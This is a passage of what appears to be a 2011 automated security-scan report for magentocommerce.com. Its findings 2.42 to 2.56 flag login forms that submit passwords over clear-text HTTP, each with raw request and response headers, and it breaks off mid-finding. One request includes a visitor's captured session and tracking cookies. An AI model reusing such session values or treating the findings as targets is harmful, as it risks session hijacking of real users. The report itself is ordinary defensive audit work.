<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.42. http://www.magentocommerce.com/he  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /he

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /he HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176550; expires=Sat, 11-Aug-2012 15:15:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fhe%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.43. http://www.magentocommerce.com/hu  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /hu

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /hu HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176571; expires=Sat, 11-Aug-2012 15:16:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fhu%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:12 GMT
Content-Length: 84278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.44. http://www.magentocommerce.com/imagine  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /imagine

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /imagine HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176634; expires=Sat, 11-Aug-2012 15:17:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fimagine%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:14 GMT
Content-Length: 36162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.45. http://www.magentocommerce.com/it  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /it

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /it HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176549; expires=Sat, 11-Aug-2012 15:15:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fit%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:49 GMT
Content-Length: 66320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.46. http://www.magentocommerce.com/jobs  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jobs HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175796; expires=Sat, 11-Aug-2012 15:03:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:16 GMT
Content-Length: 43043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.47. http://www.magentocommerce.com/jobs/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jobs/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170938; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.8.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:43:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171038; expires=Sat, 11-Aug-2012 13:43:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:43:58 GMT
Content-Length: 43043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.48. http://www.magentocommerce.com/jobs/p/2/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs/p/2/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jobs/p/2/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176479; expires=Sat, 11-Aug-2012 15:14:39 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fjobs%2Fp%2F2%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:39 GMT
Content-Length: 41691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.49. http://www.magentocommerce.com/knowledge-base  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /knowledge-base

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /knowledge-base HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176264; expires=Sat, 11-Aug-2012 15:11:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:05 GMT
Content-Length: 54452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.50. http://www.magentocommerce.com/license/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /license/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /license/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176448; expires=Sat, 11-Aug-2012 15:14:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Flicense%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:08 GMT
Content-Length: 47999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.51. http://www.magentocommerce.com/license/enterprise-edition  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /license/enterprise-edition

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /license/enterprise-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176482; expires=Sat, 11-Aug-2012 15:14:42 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A28%3A%22%2Flicense%2Fenterprise-edition%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:42 GMT
Content-Length: 47999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.52. http://www.magentocommerce.com/lodger-footwear/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /lodger-footwear/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /lodger-footwear/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176633; expires=Sat, 11-Aug-2012 15:17:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Flodger-footwear%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.53. http://www.magentocommerce.com/lt  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /lt

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /lt HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176564; expires=Sat, 11-Aug-2012 15:16:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Flt%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:05 GMT
Content-Length: 80802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.54. http://www.magentocommerce.com/magento-connect  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /magento-connect

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /magento-connect HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176191; expires=Sat, 11-Aug-2012 15:09:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fmagento-connect%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:53 GMT
Content-Length: 91518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.55. http://www.magentocommerce.com/maps/online  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /maps/online

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /maps/online HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176432; expires=Sat, 11-Aug-2012 15:13:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fmaps%2Fonline%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:52 GMT
Content-Length: 34637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.56. http://www.magentocommerce.com/media/interviews  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/
